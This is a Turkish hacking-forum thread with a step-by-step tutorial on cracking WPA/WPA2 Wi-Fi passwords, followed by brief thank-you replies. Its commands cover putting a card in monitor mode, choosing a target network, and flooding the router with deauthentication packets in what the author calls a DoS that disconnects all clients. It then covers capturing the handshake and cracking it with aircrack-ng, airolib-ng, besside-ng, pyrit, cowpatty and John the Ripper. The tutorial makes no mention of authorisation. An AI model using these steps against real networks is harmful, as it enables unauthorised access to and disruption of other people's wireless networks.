Turkhackteam.org/net - Ethical Hacking & Cyber Security Platform

Turkhackteam.org/net - Ethical Hacking & Cyber Security Platform (https://www.turkhackteam.org/)
-   Linux (https://www.turkhackteam.org/linux/)
-   -   Wifi Şifre Kırma Yöntemleri Wpa-Wpa2 // ch_arli41 (https://www.turkhackteam.org/linux/1745173-wifi-sifre-kirma-yontemleri-wpa-wpa2-ch_arli41.html)

ch_arli41 15-07-2018 05:58 05:58

Wifi Şifre Kırma Yöntemleri Wpa-Wpa2 // ch_arli41
 
Merhaba
Bu konuda wifi şifre kırma yöntemlerinde kullandiğimiz bütün toolları tek bir konuda detaylı bir şekilde anlatacam sizlere.Bu yöntemler wpa/wpa2 wifi ağları için geçerlidir.


Şimdik konumuza dönelim ve işlemlere başlıyalım.

airmon-ng wifi kartimizi aktif etmemize yarayan script'tir.

https://resmim.net/f/FDWYoM.png


https://resmim.net/f/Jg8KuG.png

Kod:

airmon-ng
Bu komut ile wifi kartima baktim.Benim wifi kartım wlan0, sizin monitor mode wlan1 veya wlan2 olabilir buna dikkat ediniz.

https://resmim.net/f/Wxk8Ky.png

Kod:

airmon-ng start wlan0
Bu komut ile wifi kartimizi dinleme moduna aldik ve monitor mode benim wlan0mon oldu.


Şimdik sıra geldi çevredeki kablosuz yayin yapan wifi ağlarını listelemeye.



https://resmim.net/f/Ow1yDH.png
https://resmim.net/f/USmynm.png


Kod:

airodump-ng wlan0mon
Bu komut ile çevredeki wifi ağlarını listeledik ve arasından bir hedef seçiyoruz
Seçtiğimiz wifi ağının (BSSID) adresini ve (CHANNEL) kanal numarasını not aliyoruz.


https://resmim.net/f/aRa8za.png
https://resmim.net/f/f3C2Rj.png

Kod:

airodump-ng wlan0mon --channel 6 --bssid 00:00:00:00:00 --write ch_arli41
--channel yayin yaptığı kanal numarasi
--bssid mac adresi
--write kaydedilecek dosya adı

Yukarda yazdığım komut ile hedefimde'ki wifi ağını dinlemeye aldım.STATION kısmında kaç kişi bağlı wifi ağına görebilirsiniz.


Şimdik geldik önemli bir noktaya burda yapacağımız, wifi ağına bağlı cihaz veya cihazların bağlantısını kesmek.Cihaz veya cihazlar wifi ağına tekrar bağlandığı zaman biz handshake yani (el sıkışma) dosyasi yakalamış oluyoruz.Bunun için aireplay-ng kullanacaz.

https://resmim.net/f/evklSZ.png
https://resmim.net/f/wljKDp.png

Kod:

aireplay-ng -0 3 -a 00:00:00:00:00 wlanom0n
Yukarıda yazdığım komut'da oynama yapabilirsiniz. -0 0 yaptığımızda kendi durmaz bunun için CTRL+C yapıp durdururuz yada -0 10 yapatığımızda 10 sefer attack yapıp kendisi durur limiti siz belirlersiniz.

Burda dikkat ediniz genelde herkezin kullandığı yöntem bağlı olan bir cihazı wifi ağından atmaktır.Benim kullandığım komut ile wifi ağına modeme direk dos attack yapıyoruz böylelikle herkesin bağlantısı kesiliyor.Bu yöntemle hadshake yakalamamiz daha çabuk oluyor.


https://resmim.net/f/g6hovI.png

Resimde sağ üst tarafta WPA handshake yaziyor demekki handshake (el sıkışma) yakaladık.



Bide bunu aircrack-ng ile kontrol edelim ve şifre kırma işlemine geçelim.


https://resmim.net/f/VtwQNC.png

Kod:

aircrack-ng ch_arli41-01.cap
Burda siz hangi ismi verdiyseniz o cap dosyasinin ismini yazacaksınız.Birtane handshake yakalamışız artık şifre kırma işlemine başlaya biliriz.

https://resmim.net/f/OvTS23.png

Kod:

aircrack-ng -a 2 handshake.cap -w wordlist-yolunuz.txt
https://resmim.net/f/gM1ijW.png


Şifre kırma işlemi başarlı oldu.





++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++






airolib-ng kullanimi.

airolib-ng ile db oluşturuyoruz bu sayede ortalama 100 mb'lik wordlist'i aircrack-ng kullanarak 20 saat sürer yada dahada uzun süre bilir ama db oluşturduk mu ozaman bu süre 5 dakika olur.internette hazir db'ler var onlarıda kullana bilirsiniz.Dikkat etmeniz tek nokta o db'in içinde sizin şifresini kırmaya çalştınız wifi ağının adı yazmasi, artık anlatıma geçelim.

https://resmim.net/f/JZ5suJ.png
https://resmim.net/f/rjTPtD.png
https://resmim.net/f/oKKzKQ.png
Kod:

airolib-ng wpa --import passwd sifreler.txt
Burdaki sifreler.txt sizin wordlist dosyaniz olacak.


https://resmim.net/f/CMM2JQ.png

Kod:

airolib-ng wpa --import essid essid.txt
Burda essid.txt yani wifi ağının adını not defterine yazıp onu belirtin.


https://resmim.net/f/rgO1dI.png

Kod:

airolib-ng wpa --clean all

https://resmim.net/f/vAsicM.png

Kod:

airolib-ng wpa --stats
bu komut ile bilgileri kontrol ediyoruz.


https://resmim.net/f/M6S9ZU.png

Kod:

airolib-ng wpa --batch
Bu komut ile artık db oluşuyor.Burda verdiğimiz wordlistin büyüklüğüne göre uzun sürer.


https://resmim.net/f/HAFdL8.png

https://resmim.net/f/9QtL8z.png


Kod:

aircrack-ng -r wpa hadshake.cap
Bu komut ile şifre kırma işlemini başlattık ve saniyeler içinde şifre kırıldığı.




++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++


Besside-ng nedir.


besside-ng yukarda uyguladığımız handshake yakalamak olayını otomatik yapan tool'dur.Kısaca airodump-ng ve aireplay-ng kullanmamıza gerek kalmadan tek bir tool ile handshake yakalıya biliyoruz evet artık anlatıma geçelim.



https://resmim.net/f/N5Wx1v.png

Kod:

besside-ng -h

Bu komut ile tool'un komutlarına bakarız.


https://resmim.net/f/YXHiF3.png

Kod:

besside-ng -c 6 -b 00:00:00:00:00 wlan0mon
-c wifi ağının yayın yaptığı kanal numarası.
-b wifi ağının mac adresi.
wlan0mon airmon-ng ile dinleme moduna aldığımız monitor mode.



https://resmim.net/f/fh75po.png

Kod:

besside-ng wlan0mon

Bu komut ile çevrenizdeki bütün wifi ağlarını tarayıp handshake yakalar.



https://resmim.net/f/13YmRj.png

Resimde gördüğünüz gibi hadshake'yi yakaladı.Kullanımı oldukca kolaydır.


https://resmim.net/f/twDw7r.png

Kod:

cat besside-ng
Bu komut ile handshake'yi kontrol ettik.Bide aircrack-ng ile kontrol edelim.


https://resmim.net/f/FWuRiA.png

Kod:

aircrack-ng wpa.cap
aircrack-ng ilede kontrol ettik hadshake'yi yakaladık.Şifre kırma işlemini yukarda anlattığım gibi yapa bilirsiniz.



https://resmim.net/f/K4poyc.png

Root dizininde 3 tane dosya oluşur.WEp.cap, wpa.cap ve besside.log olarak şifre kırmak için wpa.cap dosyasını kullanıyoruz.

--------------------------------------------------------------------------------------------------------------------


Şifre Kırma Yöntemleri


Pyrit Nedir Nasıl Kullanılır


Pyrit WPA/WPA2-PSK parolalarını kırmak için geliştirilmiş bir yazılımdır.En önemli özelligi CPU'ya ek olarak grafik işlemcilerini kullanarak parola kırma islemlerini hızlı yapmasıdır.




https://resmim.net/f/wtNsny.png
https://resmim.net/f/vFsYzd.png

Kod:

pyrit
Bu komut ile kullana bilecegimiz yardimci komutlari görüyoruz.


https://resmim.net/f/56hOUn.png

Kod:

pyrit benchmark
Bu komut ile cpu ve gpu'larin saniyede ne kadar işlem yapacagini görüyoruz.


https://resmim.net/f/ONFnB3.png

Kod:

pyrit -r wpa.cap analyze
Bu komut ile hadshake dosyamizi analiz ediyoruz.


https://resmim.net/f/XRXFQF.png

Kod:

pyrit -e ESSID create_essid
Bu komut ile pyrit'in databasesi'ne modemin ismini ekledik.


https://resmim.net/f/fjvcZk.png

Kod:

pyrit -i wordlist.txt import_passwords
Bu komut ile pyrit'in databasesi'ne şifre listemizi ekledik.


https://resmim.net/f/YNFwfQ.png

Kod:

pyrit batch
Bu komut ile pyrit database'yi oluşturuyor.Bu işlem bilgisayarınızın ve wordlist'in boyutuna göre uzun süre bilir.



https://resmim.net/f/oHE5Wl.png

Kod:

pyrit -r wpa.cap attack_db
Bu komut ile şifre kırma işlemini baslatıyoruz.Database oluşturduğmuz için saniyeler içinde şifre kırılıyor.


https://resmim.net/f/wwczvB.png
https://resmim.net/f/GffRGT.png

Kod:

pyrit -r wpa.cap -i wordlist.txt -b BSSID attack_passthrough
Database oluşturmak istemiyorsak ozaman bu komut ile direk şifre kirma işlemini yapabilirsiniz.



Bu konular ile ilgili sorunuz var ise sorabilirsiniz konu yakin zamanda güncellenecektir.




Cowpatty Kullanimi

cowpatty wpa/wpa2-psk şifrelerini kırmak için geliştirilmiş bir script'dir.


https://resmim.net/f/8cN9MX.png

Kod:

cowpatty
Bu komut ile scriptin yardımcı komutlarını görürüz.


https://resmim.net/f/do6dN1.png

Kod:

cowpatty -r wpa.cap -f wordlist.txt -s modem-ismi

-r handshake dosyasi
-f wordlist (şifre) listemizin bulunduğu dosya
-s modemin ismi.

Bu komut ile şifre kırma işlemini başlatıyoruz.


https://resmim.net/f/au6Hqu.png

Resimde gördünüz gibi şifre kırma işlemi başarılı oldu.



--------------------------------------------------------------------------


John the ripper Nedir.


John the ripper bildiğimiz şifreleme yöntemleri için geliştirilmiş hashlar'ın şifrelerini kırmak için kullandığımız bir yardımcı yazılımdır.


https://resmim.net/f/dF4Guo.png
https://resmim.net/f/i1CyCk.png

Kod:

aircrack-ng wpa.cap -J yeni-isim
Burdaki komut ile cap dosyasından, hccap formatında yeni bir dosya oluşturuyoruz.


https://resmim.net/f/8hXkLZ.png


Kod:

hccap2john wpa22.hccap > wpa11
Burdaki komutda ise oluşturmuş olduğumuz hccap dosyasınını değiştirip yeni bir dosya oluşturuyoruz.


https://resmim.net/f/1kTaMJ.png

Kod:

john wpa11
Burdaki komut ile şifre kırma işlemine başlıyoruz.Burda dikkat etmeniz gereken wpa11 burda siz hangi ismi verdiyseniz onu yazınız.




4UR0R4 15-07-2018 06:16 06:16

Ellerınıze sağlik cok başarli konu böyle kaliteli konular görmek cok hoş

Slyfer 15-07-2018 06:58 06:58

Elinize sağlık

eksen021 15-07-2018 09:01 09:01

Emeğinize sağlık hocam

Ceys 15-07-2018 12:32 12:32

Eline sağlık kardeşim

kzlsn 15-07-2018 12:34 12:34

Elinize Sağlık .

THE_ORDER 15-07-2018 12:40 12:40

Kötü amaçlar için kullanılmaz umarım. Elinize sağlık :D

atmaca7887 15-07-2018 12:42 12:42

Hocam efsane konu beinmde tek sıkıntım wordlisti bitirmesinin uzun sürmesiydi.
Sen bunun çözümünüde bırakmışsın.
Teşekkürler.

"Tranquila 15-07-2018 13:06 13:06

Eline sağlık kaliyle ilgili konularını görmek niyetiyle

THE HACKER 21 15-07-2018 13:11 13:11

Eline Sağlık Güzel Konu


Şu Anki Saat: 03:39

Powered by vBulletin® Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.